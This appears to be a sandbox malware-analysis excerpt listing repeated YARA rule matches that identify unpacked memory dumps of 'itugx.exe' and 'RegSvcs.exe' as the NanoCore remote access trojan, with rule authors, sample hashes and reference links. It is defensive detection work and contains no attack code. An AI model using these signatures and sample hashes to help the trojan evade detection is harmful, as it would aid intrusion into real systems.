Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
